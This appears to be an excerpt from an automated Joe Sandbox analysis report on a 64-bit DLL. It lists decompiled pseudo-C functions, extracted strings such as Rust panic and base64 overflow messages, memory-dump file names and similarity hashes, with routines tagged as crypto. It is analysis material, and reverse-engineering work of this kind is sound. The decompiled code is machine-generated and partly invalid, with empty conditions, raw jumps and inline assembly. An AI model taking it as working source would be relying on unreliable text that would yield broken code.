				goto 0xf30b2467;
				_t398 =  *((intOrPtr*)(_t451 + 0x40));
				if (_t398 == 1) goto 0xf30b2524;
				if (_t398 != 2) goto 0xf30b257b;
				if (_t461 - __r8 >= 0) goto 0xf30b2696;
				if (0xaaaaaaaaaaaaaaaf - 0xaaaaaaab >= 0) goto 0xf30b26a8;
				_t392 = _t441 >> 2;
				 *0xAAAAAAAAAB65865C =  *((intOrPtr*)(_t392 + 0xf31044f0));
				_t462 = _t461 + 1;
				if (_t462 - __r8 >= 0) goto 0xf30b26bd;
				if (0xaaaaaaaaaaaaaab0 - 0xaaaaaaab >= 0) goto 0xf30b26d5;
				_t248 =  *((intOrPtr*)(_t475 + _t462));
				dil = dil << 4;
				dil = dil | _t248 >> 0x00000004;
				 *0xAAAAAAAAAB65865D =  *0xAAAAB2A99DBAEFA0;
				if (0xaaaaaaaaaaaaaab1 - 0xaaaaaaab >= 0) goto 0xf30b26de;
				goto 0xf30b2567;
				if ((_t248 << 0x00000002 & 0x0000003c) == 0) goto 0xf30b20fb;
				E000007FE7FEF30FF19E( *0xAAAAB2A99DBAEFA0, 0x2d,  *(_t475 + _t461) & 0x000000ff, "integer overflow when calculating buffer size", 0xaaaaaaaaaaaaaacb, 0xf314ae90, _t462);
				asm("ud2");
				if (_t462 - __r8 >= 0) goto 0xf30b269f;
				if (0xaaaaaaaaaaaaaaaf - 0xaaaaaaab >= 0) goto 0xf30b26b1;
				 *((char*)(0xaaaaaaaaab65865c)) =  *((intOrPtr*)((_t392 >> 2) + 0xf31044f0));
				if (0xaaaaaaaaaaaaaab0 - 0xaaaaaaab >= 0) goto 0xf30b26cc;
				 *((char*)(0xaaaaaaaaab65865d)) =  *((intOrPtr*)(_t392 + 0xf31044f0));
				if (0xaaaaaaaaaaaaaab0 - 0xaaaaaaab < 0) goto 0xf30b275b;
				bpl = bpl - _t392 + _t392 * 2;
				if (0xaaaaaaaaaaaaaab0 == 0xaaaaaaab) goto 0xf30b25c9;
				if (0xf31044f0 >> 2 == 0xfffff8010cefbb0c) goto 0xf30b2685;
				 *0xAAAAB2A99F30A6F9 = 0x3d;
				if (0xbadbae - 0xf31044f0 < 0) goto 0xf30b25aa;
				goto 0xf30b25cb;
				if (0xbadbae - 0xf31044f0 < 0) goto 0xf30b276f;
				_t447 = _t451 + 0x50;
				E000007FE7FEF3055320(_t447, 0xaaaaaaab >> 1, 0xaaaaaaab, _t462);
				_t450 =  *((intOrPtr*)(_t451 + 0x48));
				if ( *_t447 == 0) goto 0xf30b2663;
				_t275 =  *((intOrPtr*)(_t451 + 0x60));
				 *(_t451 + 0x30) =  *(_t451 + 0x61);
				 *(_t451 + 0x33) =  *(_t451 + 0x64);
				if (_t275 == 2) goto 0xf30b2668;
				_t459 = _t451 + 0x50;
				 *_t459 = 0xaaaaaaab >> 1;
				_t459[1] =  *((intOrPtr*)(_t451 + 0x38));
				_t459[2] = 0xaaaaaaab;
				_t459[3] =  *((intOrPtr*)(_t451 + 0x58));
				_t459[4] = _t275;
				_t459[4] =  *(_t451 + 0x30);
				_t459[4] =  *(_t451 + 0x33);
				 *((long long*)(_t451 + 0x20)) = 0xf314ae48;
				_t262 = E000007FE7FEF30FE370( *(_t475 + _t469 + 1) << 0x00000002 ^ 0x00000003,  *(_t451 + 0x33), 0xc, 0, _t275 - 2, 0xf314ae3c,  *((intOrPtr*)(_t451 + 0x38)), _t459, 0xf314aba8, _t441);
				asm("ud2");
				 *_t450 = 0xaaaaaaab >> 1;
				_t450[1] =  *((intOrPtr*)(_t451 + 0x38));
				_t450[2] = 0xaaaaaaaaaaaaaaaf;
				return _t262;
			}

0x7fef30b209f
0x7fef30b209f
0x7fef30b20b2
0x7fef30b20c8
0x7fef30b20e3
0x7fef30b20e6
0x7fef30b20f5
0x7fef30b2100
0x7fef30b210b
0x7fef30b211a
0x7fef30b211e
0x7fef30b2129
0x7fef30b2136
0x7fef30b213d
0x7fef30b2146
0x7fef30b214f
0x7fef30b2155
0x7fef30b2159
0x7fef30b2166
0x7fef30b2178
0x7fef30b218a
0x7fef30b219c
0x7fef30b21ae
0x7fef30b21b6
0x7fef30b21c0
0x7fef30b21d0
0x7fef30b21de
0x7fef30b21e3
0x7fef30b21e8
0x7fef30b21f5
0x7fef30b2207
0x7fef30b2219
0x7fef30b222b
0x7fef30b223d
0x7fef30b2245
0x7fef30b224f
0x7fef30b225f
0x7fef30b226d
0x7fef30b2272
0x7fef30b2277
0x7fef30b2284
0x7fef30b2296
0x7fef30b22a8
0x7fef30b22ba
0x7fef30b22cc
0x7fef30b22d4
0x7fef30b22de
0x7fef30b22ee
0x7fef30b22fc
0x7fef30b2301
0x7fef30b2306
0x7fef30b2313
0x7fef30b2325
0x7fef30b2337
0x7fef30b2349
0x7fef30b235b
0x7fef30b2363
0x7fef30b236d
0x7fef30b237d
0x7fef30b238b
0x7fef30b2390
0x7fef30b2398
0x7fef30b239b
0x7fef30b23a1
0x7fef30b23a6
0x7fef30b23ae
0x7fef30b23b3
0x7fef30b23b9
0x7fef30b23ca
0x7fef30b23d0
0x7fef30b23d0
0x7fef30b23d7
0x7fef30b23e1
0x7fef30b23ee
0x7fef30b2404
0x7fef30b240d
0x7fef30b2423
0x7fef30b2442
0x7fef30b244e
0x7fef30b245c
0x7fef30b2462
0x7fef30b2467
0x7fef30b2470
0x7fef30b247a
0x7fef30b2483
0x7fef30b248c
0x7fef30b249a
0x7fef30b24a8
0x7fef30b24ac
0x7fef30b24b2
0x7fef30b24bf
0x7fef30b24c5
0x7fef30b24ce
0x7fef30b24d2
0x7fef30b24df
0x7fef30b24eb
0x7fef30b2500
0x7fef30b2504
0x7fef30b251d
0x7fef30b2522
0x7fef30b2527
0x7fef30b2530
0x7fef30b254c
0x7fef30b2557
0x7fef30b2574
0x7fef30b2581
0x7fef30b2599
0x7fef30b259c
0x7fef30b25ad
0x7fef30b25b3
0x7fef30b25c5
0x7fef30b25c7
0x7fef30b25ce
0x7fef30b25d4
0x7fef30b25e2
0x7fef30b25eb
0x7fef30b25f0
0x7fef30b25f7
0x7fef30b25ff
0x7fef30b2607
0x7fef30b2613
0x7fef30b2615
0x7fef30b261a
0x7fef30b261d
0x7fef30b2621
0x7fef30b2625
0x7fef30b2629
0x7fef30b2635
0x7fef30b2639
0x7fef30b2644
0x7fef30b265c
0x7fef30b2661
0x7fef30b2668
0x7fef30b266c
0x7fef30b2670
0x7fef30b2684

Strings

integer overflow when calculating buffer size, xrefs: 000007FEF30B250A
usize overflow when calculating b64 length, xrefs: 000007FEF30B276F

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: integer overflow when calculating buffer size$usize overflow when calculating b64 length
API String ID: 0-2142247031
Opcode ID: 3551ff67fa7cc60ae847d5307dd8952df4aff9b40174bc3768a1b64cd1415360
Instruction ID: ec234ee3f93e55f1df96885640c2a3a28157a3b1bb36a02e0454c39f5dd6d90e
Opcode Fuzzy Hash: 3551ff67fa7cc60ae847d5307dd8952df4aff9b40174bc3768a1b64cd1415360
Instruction Fuzzy Hash: AB022AB7A1D6C64ED645CB24C4142F92F67D399B80F859263DE9D8B3A6C93CE10BE340

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3056877 Relevance: 2.9, Strings: 2, Instructions: 398
COMMONCrypto

Download Yara Rule

C-Code - Quality: 30%

			E000007FE7FEF3056877(intOrPtr _a48, intOrPtr _a56, void* _a64, intOrPtr _a72, intOrPtr _a80, long long _a88) {
				void* _t25;
				signed int _t29;
				void* _t33;
				void* _t35;
				signed int _t45;
				signed int _t46;
				void* _t50;
				void* _t53;
				intOrPtr* _t61;
				long long _t65;
				signed long long _t66;
				void* _t72;
				void* _t77;
				void* _t80;

				goto 0xf30a0c64;
				 *((intOrPtr*)(_t66 - 0x41)) =  *((intOrPtr*)(_t66 - 0x41)) + _t25;
				 *_t61 =  *_t61 + _t25;
				asm("adc [eax], eax");
				if (_t25 != 0) goto 0xf30568b0;
				asm("bsr ebp, eax");
				_t45 = (r13d ^ 0x0000001c) >> 0x00000002 ^ 0x00000007;
				r15d = r13d;
				_t29 =  >=  ? 3 : _t80 - 0x110000;
				_t50 = _t29 - 1;
				if (_t50 == 0) goto 0xf3056759;
				if (_t50 < 0) goto 0xf3056af5;
				if (_t77 == 0) goto 0xf30568f5;
				if (_t77 - _a48 >= 0) goto 0xf30568ef;
				_t53 =  *((char*)(_a56 + _t77)) - 0xc0;
				if (_t53 >= 0) goto 0xf30568f5;
				goto 0xf3056af5;
				if (_t53 != 0) goto 0xf3056af5;
				if (_t72 == 0) goto 0xf3056912;
				if (_t72 - _a48 >= 0) goto 0xf305690c;
				_t46 = _t45 | 0x00000003;
				goto 0x205690e;
				 *_t61 =  *_t61 + (_t29 |  *(_t61 + 0x7fbf323c));
				 *((intOrPtr*)(_t66 + 0x4c + _t66 * 4)) =  *((intOrPtr*)(_t66 + 0x4c + _t66 * 4)) + 3;
				_a88 = _t65;
				if ( *((intOrPtr*)(_a72 + 0x18))() != 0) goto 0xf30566f9;
				bpl = 5;
				goto 0xf3056966;
				r12d = 0x110000;
				if (_t46 == 0x110000) goto 0xf3056a30;
				_t33 = _a80();
				r15d = r12d;
				if (_t33 != 0) goto 0xf30566f9;
				_t35 =  >=  ? 3 : _t80 - 0x110000;
				r12d = 0x110001;
				goto __rax;
			}

0x7fef3056877
0x7fef305687c
0x7fef305687f
0x7fef3056881
0x7fef3056899
0x7fef30568a1
0x7fef30568aa
0x7fef30568ad
0x7fef30568bf
0x7fef30568c2
0x7fef30568c5
0x7fef30568d1
0x7fef30568da
0x7fef30568e1
0x7fef30568e3
0x7fef30568e8
0x7fef30568ea
0x7fef30568ef
0x7fef30568f8
0x7fef30568ff
0x7fef3056906
0x7fef3056908
0x7fef305690f
0x7fef3056911
0x7fef3056917
0x7fef305692f
0x7fef3056937
0x7fef305693a
0x7fef3056940
0x7fef305694e
0x7fef3056957
0x7fef305695b
0x7fef3056960
0x7fef3056975
0x7fef3056978
0x7fef3056991

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30A12D6
::::1, xrefs: 000007FEF30A0D08, 000007FEF30A0FB1

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: ::::1$called `Result::unwrap()` on an `Err` value
API String ID: 0-1529206120
Opcode ID: ec834490de084f8206245a5afa412f653beead42bcca7e0e2144e786f2568807
Instruction ID: 7a78f445dbb1031effd77c71490605a296dff6977284406a882d2d2c8ae752cd
Opcode Fuzzy Hash: ec834490de084f8206245a5afa412f653beead42bcca7e0e2144e786f2568807
Instruction Fuzzy Hash: DE029032A0DB8689EFA48F11F5403AAB3E6F755784F444126EA8D47BA4EF3CE145D700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3058280 Relevance: 2.8, Strings: 2, Instructions: 310
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF3058280(signed int __ecx, void* __rcx, void* __rdx, void* __r10) {
				char _v8;
				long long _v144;
				long long _v152;
				void* _t13;
				void* _t14;
				char* _t22;
				void* _t25;
				long long _t27;

				_t22 =  &_v8;
				r10d = 0;
				r9d = 0x30;
				r11d = __ecx;
				r11b = r11b >> 4;
				_t13 =  <  ? r9d : 0x37;
				sil = sil + (__ecx & 0x0000000f);
				 *((intOrPtr*)(_t22 - 1)) = sil;
				_t27 = __r10 + 1;
				if (__ecx - 0xf > 0) goto 0xf30582a0;
				if (__rcx - _t27 - 0x81 >= 0) goto 0xf3058304;
				_v144 = _t27;
				_v152 = _t22 - 1;
				r9d = 2;
				return E000007FE7FEF3053920(1, _t14, __rdx, 0xf314cfc8, _t25);
			}

0x7fef3058288
0x7fef3058290
0x7fef3058293
0x7fef3058299
0x7fef30582a4
0x7fef30582af
0x7fef30582b3
0x7fef30582b6
0x7fef30582bd
0x7fef30582c6
0x7fef30582d7
0x7fef30582d9
0x7fef30582de
0x7fef30582ea
0x7fef3058303

Strings

called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30585C1
TryFromIntError, xrefs: 000007FEF3058616

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: TryFromIntError$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
API String ID: 0-3382309132
Opcode ID: 16bc37a697213697dd01a7fee355e8c906251a7edaab045b717df1f1506ad928
Instruction ID: e70445af712d9df2ebda0b735aa49320b18db7ce02358ab27f6f83d2fad2cfb4
Opcode Fuzzy Hash: 16bc37a697213697dd01a7fee355e8c906251a7edaab045b717df1f1506ad928
Instruction Fuzzy Hash: 38A10472F1C6858AFBB49B14E4107EA23A2F394784F849127DE8E17BB1CA3CDA45D705

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30E7CD0 Relevance: 2.6, Strings: 2, Instructions: 82
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF30E7CD0(void* __eax, long long __rbx, signed long long* __rcx, long long __rdi, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24, long long _a32) {
				signed long long _t45;
				signed long long _t46;
				signed long long _t53;
				signed long long _t57;
				signed long long _t61;
				signed long long _t65;
				signed long long _t69;
				signed long long _t73;
				signed long long _t77;
				signed long long _t81;
				signed long long _t83;
				signed long long _t86;
				signed long long _t87;
				signed long long _t90;
				signed long long _t91;
				signed long long _t98;
				signed long long _t101;
				signed long long _t102;
				signed long long _t103;
				signed long long _t106;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_a32 = __rdi;
				_t90 = __rcx[1];
				_t45 = __rcx[3];
				_t86 = __rcx[5];
				_t102 = __rcx[7];
				_t81 = ( *__rcx >> 0x00000001 ^ _t90) & 0x55555555;
				_t91 = _t90 ^ _t81;
				_t106 = _t81 + _t81 ^  *__rcx;
				_t53 = (__rcx[2] >> 0x00000001 ^ _t45) & 0x55555555;
				_t46 = _t45 ^ _t53;
				_t98 = _t53 + _t53 ^ __rcx[2];
				_t57 = (__rcx[4] >> 0x00000001 ^ _t86) & 0x55555555;
				_t87 = _t86 ^ _t57;
				_t101 = _t57 + _t57 ^ __rcx[4];
				_t61 = (__rcx[6] >> 0x00000001 ^ _t102) & 0x55555555;
				_t103 = _t102 ^ _t61;
				_t83 = _t61 + _t61 ^ __rcx[6];
				_t65 = (_t106 >> 0x00000002 ^ _t98) & 0x33333333;
				__rcx[2] = _t98 ^ _t65;
				 *__rcx = _t65 * 0x00000004 ^ _t106;
				_t69 = (_t91 >> 0x00000002 ^ _t46) & 0x33333333;
				__rcx[3] = _t46 ^ _t69;
				_t73 = (_t101 >> 0x00000002 ^ _t83) & 0x33333333;
				__rcx[1] = _t69 * 0x00000004 ^ _t91;
				__rcx[6] = _t83 ^ _t73;
				__rcx[4] = _t73 * 0x00000004 ^ _t101;
				_t77 = (_t87 >> 0x00000002 ^ _t103) & 0x33333333;
				__rcx[5] = _t77 * 0x00000004 ^ _t87;
				__rcx[7] = _t103 ^ _t77;
				return __eax;
			}

0x7fef30e7cd0
0x7fef30e7cd5
0x7fef30e7cda
0x7fef30e7cdf
0x7fef30e7ce6
0x7fef30e7cfa
0x7fef30e7d01
0x7fef30e7d08
0x7fef30e7d0c
0x7fef30e7d0f
0x7fef30e7d16
0x7fef30e7d23
0x7fef30e7d26
0x7fef30e7d31
0x7fef30e7d3b
0x7fef30e7d3e
0x7fef30e7d49
0x7fef30e7d53
0x7fef30e7d60
0x7fef30e7d6a
0x7fef30e7d75
0x7fef30e7d7b
0x7fef30e7d94
0x7fef30e7d97
0x7fef30e7d9d
0x7fef30e7dc0
0x7fef30e7dc3
0x7fef30e7dca
0x7fef30e7de3
0x7fef30e7de7
0x7fef30e7e02
0x7fef30e7e06
0x7fef30e7e0c

Strings

33333333, xrefs: 000007FEF30E7D56
UUUUUUUU, xrefs: 000007FEF30E7CF0

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: 33333333$UUUUUUUU
API String ID: 0-3483174168
Opcode ID: eb018479607a1debda691d68d3cbd06004f5d08130fee0c5c883cfc40522e742
Instruction ID: c015d4352b93a1ed5b3743f64d832b2b055081e4a4da6884ec6b56be325af7a4
Opcode Fuzzy Hash: eb018479607a1debda691d68d3cbd06004f5d08130fee0c5c883cfc40522e742
Instruction Fuzzy Hash: 3E310C62314E4085EE14CF65E879AAA73A9F748F94B5AA527DF4E43B54DF3CC101C340

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30A2000 Relevance: 1.7, Strings: 1, Instructions: 452
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E000007FE7FEF30A2000(void* __edx, signed char** __rcx, void* __r8) {
				long long _v64;
				long long _v72;
				long long _v88;
				long long _v96;
				char _v104;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t137;
				signed int _t142;
				signed int _t148;
				signed int _t159;
				signed int _t165;
				signed int _t176;
				void* _t188;
				void* _t190;
				void* _t196;
				void* _t197;
				signed int _t206;
				void* _t226;
				void* _t232;
				void* _t246;
				void* _t250;
				void* _t251;
				void* _t255;
				void* _t264;
				void* _t270;
				void* _t271;
				void* _t276;
				void* _t285;
				void* _t295;
				void* _t306;
				void* _t307;
				void* _t317;
				void* _t318;
				void* _t323;
				signed char* _t330;
				signed char* _t332;
				signed char* _t334;
				signed char* _t335;
				signed char* _t336;
				signed char* _t341;
				signed char* _t342;
				signed char** _t344;
				signed char* _t352;
				signed char* _t354;
				signed char* _t355;
				signed char* _t356;
				signed char* _t358;
				signed char* _t359;
				signed char* _t361;
				signed char* _t362;
				signed char* _t365;
				signed char* _t366;
				signed char* _t367;
				signed char* _t369;
				signed char* _t370;
				signed char* _t379;
				signed char* _t380;
				signed char* _t381;
				void* _t382;
				signed char* _t383;
				signed char* _t384;
				signed char* _t386;
				signed char* _t388;

				r9d = __edx;
				_t383 = __rcx[1];
				if (_t383 == 0) goto 0xf30a2079;
				if (r9d - 0xffff <= 0) goto 0xf30a2086;
				_t386 =  &(( *__rcx)[1]);
				_t384 = _t383 - 1;
				 *__rcx = _t386;
				__rcx[1] = _t384;
				_v104 = 0xf3124e58;
				_v96 = 1;
				_v88 = 0;
				_v72 = "called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value";
				_v64 = 0;
				_t344 =  &_v104;
				E000007FE7FEF30FE160(_t188, _t197, __edx, _t226, r9d - 0xffff, _t344, 0xf3124e68, __r8, _t382, _t386);
				asm("ud2");
				if (r9d - 0xffff > 0) goto 0xf30a2658;
				if (r9d - 0xa <= 0) goto 0xf30a209d;
				if (r9d - 0x24 <= 0) goto 0xf30a20df;
				if (_t384 == 0) goto 0xf30a2658;
				goto 0xf30a2026;
				if (__r8 != 1) goto 0xf30a211d;
				if (_t384 == 0) goto 0xf30a2261;
				r12d =  *_t386 & 0x000000ff;
				 *_t344 =  &(_t386[1]);
				_t344[1] = _t384 - 1;
				r12d = r12d + 0xffffffd0;
				_t264 = r12d - r9d;
				if (_t264 >= 0) goto 0xf30a2263;
				if ((0 | _t264 > 0x00000000) == 1) goto 0xf30a2279;
				goto 0xf30a2658;
				if (__r8 != 1) goto 0xf30a21a5;
				if (_t384 == 0) goto 0xf30a22b3;
				 *_t344 =  &(_t386[1]);
				_t344[1] = _t384 - 1;
				r12d = 0x7fef3124e38;
				if (r12d - 0xa >= 0) goto 0xf30a22b7;
				goto 0xf30a22e2;
				r12d = 0;
				_t330 = _t384;
				_t361 = _t386;
				r8d = 0;
				if (_t330 == 0) goto 0xf30a2159;
				 *_t344 =  &(_t361[1]);
				_t344[1] = _t330 - 1;
				_t190 = ( *_t361 & 0x000000ff) + 0xffffffd0;
				_t270 = _t190 - r9d;
				if (_t270 < 0) goto 0xf30a2166;
				 *_t344 = _t361;
				_t344[1] = _t330;
				_t271 = (0 | _t270 > 0x00000000) - 1;
				if (_t271 != 0) goto 0xf30a2253;
				_t131 = r12d * r9w;
				if (_t271 < 0) goto 0xf30a2658;
				r12d = _t131;
				r12w = r12w + _t190;
				if (_t190 - 0xffff > 0) goto 0xf30a2658;
				if ((_t131 & 0xffffff00 | _t271 > 0x00000000) != 0) goto 0xf30a2658;
				_t362 = _t361;
				goto 0xf30a2130;
				r12d = 0;
				r14d = 0xffffffff;
				_t332 = _t384;
				_t352 = _t386;
				r8d = 0;
				asm("o16 nop [eax+eax]");
				if (_t332 == 0) goto 0xf30a2208;
				 *_t344 =  &(_t352[1]);
				_t344[1] = _t332 - 1;
				_t33 = _t362 - 0x30; // 0xffffffcf
				_t206 = _t33;
				if (_t206 - 0xa >= 0) goto 0xf30a21f0;
				goto 0xf30a2215;
				_t232 =  <  ? r14d : (_t206 | 0x00000020) + 0xffffffa9;
				_t276 = _t232 - r9d;
				bpl = _t276 > 0;
				if (_t276 < 0) goto 0xf30a2215;
				 *_t344 = _t352;
				_t344[1] = _t332;
				if (0 != 1) goto 0xf30a2253;
				_t134 = r12d * r9w;
				if (0 - 1 < 0) goto 0xf30a2658;
				r12d = _t134;
				r12w = r12w + _t232;
				if (_t232 - 0xffff > 0) goto 0xf30a2658;
				if ((_t134 & 0xffffff00 | 0 - 0x00000001 > 0x00000000) != 0) goto 0xf30a2658;
				goto 0xf30a21c0;
				if (__r8 + 2 != 0) goto 0xf30a2673;
				goto 0xf30a2658;
				 *_t344 = _t386;
				_t344[1] = _t384;
				_t354 = _t384;
				_t334 = _t386;
				if (0 != 1) goto 0xf30a2658;
				if (r12d - 0xffff > 0) goto 0xf30a2658;
				if (_t354 == 0) goto 0xf30a2329;
				 *_t344 =  &(_t334[1]);
				_t344[1] = _t354 - 1;
				if (( *_t334 & 0x000000ff) + 0xffffffd0 - r9d >= 0) goto 0xf30a232b;
				goto 0xf30a2338;
				goto 0xf30a22d5;
				r12d = 0xffffffff;
				r12d =  >=  ? 0xffffffc9 : r12d;
				_t285 = r12d - r9d;
				bpl = _t285 > 0;
				if (_t285 < 0) goto 0xf30a22e2;
				 *_t344 = _t386;
				_t344[1] = _t384;
				_t355 = _t384;
				_t335 = _t386;
				if (0 != 1) goto 0xf30a2658;
				if (r12d - 0xffff > 0) goto 0xf30a2658;
				if (_t355 == 0) goto 0xf30a239e;
				 *_t344 =  &(_t335[1]);
				_t344[1] = _t355 - 1;
				if (0x7fef3124e38 - 0xa >= 0) goto 0xf30a23a2;
				goto 0xf30a23cb;
				 *_t344 = _t335;
				_t344[1] = _t355;
				_t365 = _t355;
				_t388 = _t335;
				if (0 != 1) goto 0xf30a2673;
				_t136 = r12d;
				_t137 = _t136 * r9w;
				if (0 - 1 < 0) goto 0xf30a2658;
				r12d = _t137;
				r12w = r12w + 1;
				if (1 - 0xffff > 0) goto 0xf30a2658;
				if ((_t137 & 0xffffff00 | 0 - 0x00000001 > 0x00000000) != 0) goto 0xf30a2658;
				if (_t365 == 0) goto 0xf30a2431;
				_t356 = _t365 - 1;
				 *_t344 =  &(_t388[1]);
				_t344[1] = _t356;
				if (( *_t388 & 0x000000ff) + 0xffffffd0 - r9d >= 0) goto 0xf30a2433;
				goto 0xf30a2440;
				goto 0xf30a23be;
				_t196 =  >=  ? (_t136 * r9w >> 0x00000020 | 0x00000020) + 0xffffffa9 : 0xffffffff;
				_t295 = 0xffffffff - r9d;
				bpl = _t295 > 0;
				if (_t295 < 0) goto 0xf30a23cb;
				 *_t344 = _t335;
				_t344[1] = _t356;
				_t366 = _t356;
				if (0 != 1) goto 0xf30a2673;
				_t142 = r12d * r9w;
				if (0 - 1 < 0) goto 0xf30a2658;
				r12d = _t142;
				r12w = r12w + _t196;
				if (_t196 - 0xffff > 0) goto 0xf30a2658;
				if ((_t142 & 0xffffff00 | 0 - 0x00000001 > 0x00000000) != 0) goto 0xf30a2658;
				if (_t366 == 0) goto 0xf30a24a6;
				 *_t344 =  &(_t335[1]);
				_t344[1] = _t366 - 1;
				_t246 = _t335 - 0x30;
				if (_t246 - 0xa >= 0) goto 0xf30a24aa;
				goto 0xf30a24d2;
				 *_t344 = _t388;
				_t344[1] = _t366;
				_t358 = _t366;
				_t379 = _t388;
				if (0 != 1) goto 0xf30a2673;
				_t148 = r12d * r9w;
				if (0 - 1 < 0) goto 0xf30a2658;
				r12d = _t148;
				r12w = r12w + _t246;
				if (_t246 - 0xffff > 0) goto 0xf30a2658;
				if ((_t148 & 0xffffff00 | 0 - 0x00000001 > 0x00000000) != 0) goto 0xf30a2658;
				if (_t358 == 0) goto 0xf30a2537;
				_t367 = _t358 - 1;
				 *_t344 =  &(_t379[1]);
				_t344[1] = _t367;
				if (( *_t379 & 0x000000ff) + 0xffffffd0 - r9d >= 0) goto 0xf30a2539;
				goto 0xf30a2546;
				goto 0xf30a24c5;
				_t250 =  >=  ? 0xffffffc9 : 0xffffffff;
				_t306 = 0xffffffff - r9d;
				if (_t306 < 0) goto 0xf30a24d2;
				 *_t344 = _t379;
				_t344[1] = _t367;
				_t341 = _t367;
				_t359 = _t379;
				_t307 = (0 | _t306 > 0x00000000) - 1;
				if (_t307 != 0) goto 0xf30a2673;
				_t159 = r12d * r9w;
				if (_t307 < 0) goto 0xf30a2658;
				r12d = _t159;
				r12w = r12w + _t250;
				if (_t250 - 0xffff > 0) goto 0xf30a2658;
				if ((_t159 & 0xffffff00 | _t307 > 0x00000000) != 0) goto 0xf30a2658;
				if (_t341 == 0) goto 0xf30a25ab;
				_t380 =  &(_t359[1]);
				 *_t344 = _t380;
				_t344[1] = _t341 - 1;
				_t251 = _t335 - 0x30;
				if (_t251 - 0xa >= 0) goto 0xf30a25af;
				goto 0xf30a25d7;
				 *_t344 = _t380;
				_t344[1] = _t359;
				_t369 = _t359;
				_t342 = _t380;
				if (0 != 1) goto 0xf30a2673;
				_t165 = r12d * r9w;
				if (0 - 1 < 0) goto 0xf30a2658;
				r12d = _t165;
				r12w = r12w + _t251;
				if (_t251 - 0xffff > 0) goto 0xf30a2658;
				if ((_t165 & 0xffffff00 | 0 - 0x00000001 > 0x00000000) != 0) goto 0xf30a2658;
				if (_t369 == 0) goto 0xf30a2626;
				_t336 =  &(_t342[1]);
				 *_t344 = _t336;
				_t344[1] = _t369 - 1;
				if (( *_t342 & 0x000000ff) + 0xffffffd0 - r9d >= 0) goto 0xf30a2628;
				goto 0xf30a2653;
				goto 0xf30a25ca;
				_t255 =  >=  ? 0xffffffc9 : 0xffffffff;
				_t317 = 0xffffffff - r9d;
				if (_t317 < 0) goto 0xf30a25d7;
				 *_t344 = _t359;
				_t344[1] = _t342;
				_t370 = _t342;
				_t381 = _t359;
				_t318 = (0 | _t317 > 0x00000000) - 1;
				if (_t318 != 0) goto 0xf30a2673;
				_t176 = r12d * r9w;
				if (_t318 < 0) goto 0xf30a2658;
				r12d = _t176;
				r12w = r12w + _t255;
				if (_t255 - 0xffff > 0) goto 0xf30a2658;
